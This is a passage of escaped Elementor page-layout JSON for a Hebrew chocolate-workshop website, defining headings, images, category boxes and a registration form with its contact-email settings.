settings=\\\"%7B%7D\\\"]\"},\"width\":{\"unit\":\"px\",\"size\":120},\"width_mobile\":{\"unit\":\"px\",\"size\":80},\"align_mobile\":\"left\",\"image\":{\"id\":\"38\",\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/placeholder.png\"},\"align\":\"center\"},\"elements\":[],\"widgetType\":\"theme-site-logo\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"376ec0e9\",\"elType\":\"section\",\"settings\":{\"background_background\":\"gradient\",\"background_color\":\"#e8e8e8\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"60\",\"bottom\":\"0\",\"left\":\"60\",\"isLinked\":false},\"gap\":\"no\",\"background_color_b\":\"#f4f4f4\",\"padding_tablet\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"20\",\"bottom\":\"10\",\"left\":\"20\",\"isLinked\":false},\"sticky\":\"top\"},\"elements\":[{\"id\":\"2a6711cf\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size_mobile\":100},\"elements\":[{\"id\":\"66f452c6\",\"elType\":\"widget\",\"settings\":{\"align_items\":\"justify\",\"animation_line\":\"grow\",\"animation_text\":\"none\",\"color_menu_item\":\"#7a7a7a\",\"color_menu_item_hover\":\"#ffffff\",\"pointer_color_menu_item_hover\":\"#692910\",\"menu_typography_typography\":\"custom\",\"menu_typography_font_size\":{\"unit\":\"px\",\"size\":15},\"pointer_width\":{\"unit\":\"px\",\"size\":3},\"color_dropdown_item\":\"#000000\",\"background_color_dropdown_item\":\"#f2f2f2\",\"color_dropdown_item_hover\":\"#02d3c9\",\"background_color_dropdown_item_hover\":\"#ededed\",\"dropdown_typography_typography\":\"custom\",\"dropdown_typography_font_size\":{\"unit\":\"px\",\"size\":15},\"toggle_color\":\"#02d3c9\",\"toggle_color_hover\":\"#54595f\",\"toggle_size\":{\"unit\":\"px\",\"size\":30},\"toggle_border_width\":{\"unit\":\"px\",\"size\":0},\"toggle_border_radius\":{\"unit\":\"px\",\"size\":0},\"pointer\":\"background\",\"menu_typography_text_transform\":\"uppercase\",\"dropdown\":\"mobile\",\"full_width\":\"stretch\",\"color_menu_item_active\":\"#ffffff\",\"animation_background\":\"sweep-down\",\"padding_vertical_menu_item\":{\"unit\":\"px\",\"size\":18},\"toggle_background_color\":\"rgba(0,0,0,0)\"},\"elements\":[],\"widgetType\":\"nav-menu\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7e94e72f\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"height\":\"min-height\",\"custom_height\":{\"unit\":\"vh\",\"size\":\"60\"},\"column_position\":\"stretch\",\"background_background\":\"classic\",\"background_image\":{\"id\":35,\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/HDR.jpg\"},\"background_position\":\"center center\",\"background_size\":\"cover\",\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"30\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"25\",\"bottom\":\"40\",\"left\":\"25\",\"isLinked\":false}},\"elements\":[{\"id\":\"3b866986\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"rgba(255,255,255,0.73)\",\"margin\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"63\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"53\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5c8a61fd\",\"elType\":\"widget\",\"settings\":{\"image\":{\"id\":33,\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/logoup.png\"},\"space\":{\"unit\":\"%\",\"size\":18},\"_padding\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false},\"_background_background\":\"classic\",\"_background_color\":\"#f1d5ad\",\"image_size\":\"full\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"1f909fe7\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05dc\\u05d8\\u05e2\\u05d5\\u05dd \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d0\\u05d9\\u05db\\u05d5\\u05ea\\u05d9 \\u05d1\\u05d9\\u05d5\\u05dd \\u05d0\\u05d7\\u05d3 \\u05d8\\u05e2\\u05d9\\u05dd \\u05d1\\u05de\\u05d9\\u05d5\\u05d7\\u05d3\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#40272c\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":\"45\"},\"typography_font_weight\":\"100\",\"typography_line_height\":{\"unit\":\"em\",\"size\":\"0.9\"},\"_padding\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false},\"typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"38\"},\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"35\"},\"_padding_tablet\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"10\",\"left\":\"0\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"px\",\"top\":\"15\",\"right\":\"0\",\"bottom\":\"15\",\"left\":\"0\",\"isLinked\":false},\"typography_font_family\":\"Open Sans Hebrew\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"35481412\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05d1\\u05d5\\u05d0\\u05d5 \\u05dc\\u05d4\\u05d9\\u05e8\\u05e9\\u05dd \\u05dc\\u05e1\\u05d3\\u05e0\\u05ea \\u05d4\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d4\\u05e7\\u05e8\\u05d5\\u05d1\\u05d4\",\"align\":\"center\",\"title_color\":\"#40272c\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":\"22\"},\"typography_font_weight\":\"bold\",\"typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"20\"},\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"18\"},\"typography_font_family\":\"Open Sans Hebrew\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"41e0dd23\",\"elType\":\"widget\",\"settings\":{\"form_name\":\"New Form\",\"form_fields\":[{\"field_type\":\"text\",\"field_label\":\"\\u05e9\\u05dd\",\"placeholder\":\"\\u05e9\\u05dd\",\"width\":\"100\",\"_id\":\"eovd5tr\",\"required\":\"true\",\"field_options\":\"\",\"inline_list\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"field_value\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"field_html\":\"\",\"custom_id\":\"eovd5tr\"},{\"field_type\":\"email\",\"required\":\"true\",\"field_label\":\"\\u05de\\u05d9\\u05d9\\u05dc\",\"placeholder\":\"\\u05de\\u05d9\\u05d9\\u05dc\",\"width\":\"100\",\"_id\":\"68frv7y\",\"field_options\":\"\",\"inline_list\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"field_value\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"field_html\":\"\",\"custom_id\":\"68frv7y\"},{\"field_type\":\"tel\",\"field_label\":\"\\u05d8\\u05dc\'\",\"placeholder\":\"\\u05d8\\u05dc\'\",\"width\":\"100\",\"_id\":\"p0rl9g7\",\"required\":\"\",\"field_options\":\"\",\"inline_list\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"field_value\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"field_html\":\"\",\"custom_id\":\"p0rl9g7\"}],\"show_labels\":\"\",\"button_text\":\"\\u05d2\\u05dd \\u05d0\\u05e0\\u05d9 \\u05e8\\u05d5\\u05e6\\u05d4 \\u05dc\\u05d4\\u05d9\\u05e8\\u05e9\\u05dd \\u05dc\\u05e1\\u05d3\\u05e0\\u05d4!\",\"success_message\":\"The message was sent successfully!\",\"error_message\":\"There\'s something wrong... Please fill in the required fields.\",\"required_field_message\":\"Required\",\"invalid_message\":\"There\'s something wrong... The form is invalid.\",\"column_gap\":{\"unit\":\"px\",\"size\":\"10\"},\"row_gap\":{\"unit\":\"px\",\"size\":\"15\"},\"field_text_color\":\"#54595f\",\"field_border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"field_border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"button_typography_typography\":\"custom\",\"button_typography_font_weight\":\"bold\",\"button_typography_letter_spacing\":{\"unit\":\"px\",\"size\":\"3\"},\"button_background_color\":\"#5c0011\",\"button_border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"button_text_padding\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"40\",\"bottom\":\"40\",\"left\":\"40\",\"isLinked\":false},\"field_typography_typography\":\"custom\",\"field_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"13\"},\"button_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"14\"},\"_padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"22\",\"bottom\":\"22\",\"left\":\"22\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":false},\"button_background_hover_color\":\"#40272c\",\"input_size\":\"md\",\"button_size\":\"md\",\"email_to\":\"shmulik@shmul.co.il\",\"email_subject\":\"New message from \\\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\\"\",\"email_content\":\"[all-fields]\",\"email_from\":\"email@chocoded.co.il\",\"email_from_name\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"email_to_2\":\"shmulik@shmul.co.il\",\"email_subject_2\":\"New message from \\\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\\"\",\"email_content_2\":\"[all-fields]\",\"email_from_2\":\"email@chocoded.co.il\",\"email_from_name_2\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"email_reply_to_2\":\"shmulik@shmul.co.il\",\"label_typography_typography\":\"custom\",\"label_typography_font_family\":\"Open Sans Hebrew\"},\"elements\":[],\"widgetType\":\"form\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4f74ca63\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"structure\":\"20\",\"background_background\":\"classic\",\"background_color\":\"#e3e0dd\",\"padding\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"100\",\"bottom\":\"100\",\"left\":\"100\",\"isLinked\":true},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"70\",\"right\":\"40\",\"bottom\":\"40\",\"left\":\"40\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"70\",\"right\":\"20\",\"bottom\":\"70\",\"left\":\"20\",\"isLinked\":false}},\"elements\":[{\"id\":\"655473aa\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":\"55.702\",\"margin\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"12\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[{\"id\":\"13679594\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05d1\\u05d5\\u05d0\\u05d5 \\u05dc\\u05d0\\u05db\\u05d5\\u05dc \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05e2\\u05dd \\u05d7\\u05d1\\u05e8\\u05d9\\u05dd\",\"align\":\"right\",\"title_color\":\"#40272c\",\"typography_font_size\":{\"unit\":\"px\",\"size\":\"35\"},\"typography_font_family\":\"Open Sans Hebrew\",\"typography_font_weight\":\"100\",\"typography_text_transform\":\"capitalize\",\"typography_line_height\":{\"unit\":\"em\",\"size\":\"1\"},\"align_mobile\":\"center\",\"typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"31\"},\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"30\"},\"typography_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"66f30f3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u05db\\u05d5\\u05dc\\u05e0\\u05d5 \\u05d0\\u05d5\\u05d4\\u05d1\\u05d9\\u05dd \\u05d0\\u05ea \\u05d4\\u05e7\\u05d9\\u05e0\\u05d5\\u05d7 \\u05e9\\u05d0\\u05d7\\u05e8\\u05d9, \\u05d7\\u05dc\\u05e7\\u05e0\\u05d5 \\u05d0\\u05e4\\u05d9\\u05dc\\u05d5 \\u05d0\\u05d5\\u05db\\u05dc\\u05d9\\u05dd \\u05e4\\u05d7\\u05d5\\u05ea \\u05d1\\u05d0\\u05e8\\u05d5\\u05d7\\u05ea \\u05d4\\u05e2\\u05e8\\u05d1 \\u05e8\\u05e7 \\u05db\\u05d3\\u05d9 \\u05e9\\u05e0\\u05d5\\u05db\\u05dc \\u05dc\\u05e0\\u05e6\\u05dc \\u05d0\\u05ea \\u05ea\\u05e4\\u05e8\\u05d9\\u05d8 \\u05d4\\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd \\u05e2\\u05d3 \\u05ea\\u05d5\\u05de\\u05d5, \\u05d0\\u05d6 \\u05dc\\u05de\\u05d4 \\u05e9\\u05dc\\u05d0 \\u05e0\\u05e2\\u05e9\\u05d4 \\u05d9\\u05d5\\u05dd \\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd?<\\/p><p>\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05e0\\u05d5\\u05e6\\u05e8\\u05d5 \\u05d1\\u05de\\u05d9\\u05d5\\u05d7\\u05d3 \\u05dc\\u05e8\\u05d2\\u05e2\\u05d9\\u05dd \\u05d4\\u05d0\\u05dc\\u05d4, \\u05e9\\u05e0\\u05d5\\u05db\\u05dc \\u05dc\\u05d4\\u05d2\\u05d9\\u05e2 \\\"\\u05db\\u05de\\u05e2\\u05d8 \\u05e9\\u05d1\\u05e2\\u05d9\\u05dd\\\" \\u05d5\\u05dc\\u05d9\\u05d4\\u05e0\\u05d5\\u05ea \\u05de\\u05de\\u05d2\\u05d5\\u05d5\\u05df \\u05de\\u05d0\\u05db\\u05dc\\u05d9\\u05dd \\u05d8\\u05e2\\u05d9\\u05de\\u05d9\\u05dd \\u05e9\\u05e1\\u05d5\\u05d1\\u05d1\\u05d9\\u05dd \\u05e1\\u05d1\\u05d9\\u05d1 \\u05d4\\u05d0\\u05d5\\u05db\\u05dc \\u05d4\\u05de\\u05ea\\u05d5\\u05e7 \\u05d4\\u05d0\\u05d4\\u05d5\\u05d1 \\u05e2\\u05dc \\u05db\\u05d5\\u05dc\\u05e0\\u05d5, \\u05d4\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3. \\u05d4\\u05d7\\u05dc \\u05de\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05de\\u05e8\\u05d9\\u05e8 \\u05d5\\u05e2\\u05d3 \\u05dc\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05e0\\u05d5\\u05d6\\u05dc, \\u05d4\\u05db\\u05dc \\u05e2\\u05dc \\u05de\\u05e0\\u05ea \\u05dc\\u05d9\\u05d4\\u05e0\\u05d5\\u05ea \\u05de\\u05d9\\u05d5\\u05dd \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\u05d9 \\u05dc\\u05de\\u05d3\\u05d9 \\u05d1\\u05db\\u05dc \\u05e6\\u05d5\\u05e8\\u05d4 \\u05d5\\u05e6\\u05d1\\u05e2, \\u05db\\u05dc \\u05d3\\u05e8\\u05da \\u05d5\\u05e9\\u05e2\\u05d4.\\u00a0<\\/p>\",\"text_color\":\"#54595f\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":19},\"typography_font_family\":\"Open Sans Hebrew\",\"typography_line_height\":{\"unit\":\"em\",\"size\":\"1.6\"},\"align_mobile\":\"center\",\"typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"14\"},\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"17\"},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"15f91cbb\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":\"44.298\",\"margin\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"content_position\":\"center\",\"margin_tablet\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"385ae28\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/inner-hp.jpg\",\"id\":26}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4477cb\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"structure\":\"40\",\"background_background\":\"classic\",\"background_color\":\"#ffffff\",\"padding\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"100\",\"bottom\":\"100\",\"left\":\"100\",\"isLinked\":true},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"25\",\"bottom\":\"50\",\"left\":\"25\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"20\",\"bottom\":\"60\",\"left\":\"20\",\"isLinked\":false}},\"elements\":[{\"id\":\"702ee38f\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"24\",\"bottom\":\"0\",\"left\":\"24\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"screen_sm\":\"custom\",\"screen_sm_width\":\"50\"},\"elements\":[{\"id\":\"60600fc4\",\"elType\":\"widget\",\"settings\":{\"image\":{\"id\":32,\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/c-couple.png\"},\"title_text\":\"\",\"description_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea\",\"image_space\":{\"unit\":\"px\",\"size\":30},\"image_size\":{\"unit\":\"%\",\"size\":\"75\"},\"description_color\":\"#40272c\",\"description_typography_font_size\":{\"unit\":\"px\",\"size\":\"25\"},\"description_typography_font_family\":\"Damion\",\"description_typography_line_height\":{\"unit\":\"em\",\"size\":\"1\"},\"description_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"19\"},\"description_typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"20\"},\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/%D7%A1%D7%93%D7%A0%D7%AA-%D7%A9%D7%95%D7%A7%D7%95%D7%9C%D7%93-%D7%96%D7%95%D7%92%D7%99%D7%AA\\/\",\"is_external\":\"\",\"nofollow\":\"\"}},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false},{\"id\":\"f9b0ce7\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"24\",\"bottom\":\"0\",\"left\":\"24\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"screen_sm\":\"custom\",\"screen_sm_width\":\"50\"},\"elements\":[{\"id\":\"6945b5b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"id\":31,\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/c-woman.png\"},\"title_text\":\"\",\"description_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05e1\\u05d9\\u05d1\\u05ea \\u05e8\\u05d5\\u05d5\\u05e7\\u05d5\\u05ea\",\"image_space\":{\"unit\":\"px\",\"size\":30},\"image_size\":{\"unit\":\"%\",\"size\":\"75\"},\"description_color\":\"#40272c\",\"description_typography_font_size\":{\"unit\":\"px\",\"size\":\"25\"},\"description_typography_font_family\":\"Damion\",\"description_typography_line_height\":{\"unit\":\"em\",\"size\":\"1\"},\"description_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"19\"},\"description_typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"20\"},\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/%D7%A1%D7%93%D7%A0%D7%AA-%D7%A9%D7%95%D7%A7%D7%95%D7%9C%D7%93-%D7%9C%D7%9E%D7%A1%D7%99%D7%91%D7%AA-%D7%A8%D7%95%D7%95%D7%A7%D7%95%D7%AA\\/\",\"is_external\":\"\",\"nofollow\":\"\"}},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false},{\"id\":\"fa7a00f\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"24\",\"bottom\":\"0\",\"left\":\"24\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"screen_sm\":\"custom\",\"screen_sm_width\":\"50\"},\"elements\":[{\"id\":\"afa7d0f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"id\":28,\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/c-company.png\"},\"title_text\":\"\",\"description_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d7\\u05d1\\u05e8\\u05d5\\u05ea\",\"image_space\":{\"unit\":\"px\",\"size\":30},\"image_size\":{\"unit\":\"%\",\"size\":\"75\"},\"description_color\":\"#40272c\",\"description_typography_font_size\":{\"unit\":\"px\",\"size\":\"25\"},\"description_typography_font_family\":\"Damion\",\"description_typography_line_height\":{\"unit\":\"em\",\"size\":\"1\"},\"description_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"19\"},\"description_typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"20\"},\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/%D7%A1%D7%93%D7%A0%D7%AA-%D7%A9%D7%95%D7%A7%D7%95%D7%9C%D7%93-%D7%9C%D7%97%D7%91%D7%A8%D7%95%D7%AA\\/\",\"is_external\":\"\",\"nofollow\":\"\"}},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false},{\"id\":\"4a4b992\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"24\",\"bottom\":\"0\",\"left\":\"24\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"screen_sm\":\"custom\",\"screen_sm_width\":\"50\"},\"elements\":[{\"id\":\"c498248\",\"elType\":\"widget\",\"settings\":{\"image\":{\"id\":30,\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/c-kids.png\"},\"title_text\":\"\",\"description_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd\",\"image_space\":{\"unit\":\"px\",\"size\":30},\"image_size\":{\"unit\":\"%\",\"size\":\"75\"},\"description_color\":\"#40272c\",\"description_typography_font_size\":{\"unit\":\"px\",\"size\":\"25\"},\"description_typography_font_family\":\"Damion\",\"description_typography_line_height\":{\"unit\":\"em\",\"size\":\"1\"},\"description_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"19\"},\"description_typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"20\"},\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/%D7%A1%D7%93%D7%A0%D7%AA-%D7%A9%D7%95%D7%A7%D7%95%D7%9C%D7%93-%D7%9C%D7%99%D7%9C%D7%93%D7%99%D7%9D\\/\",\"is_external\":\"\",\"nofollow\":\"\"}},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5684ff50\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"id\":91,\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/BG.jpg\"},\"background_size\":\"cover\",\"background_overlay_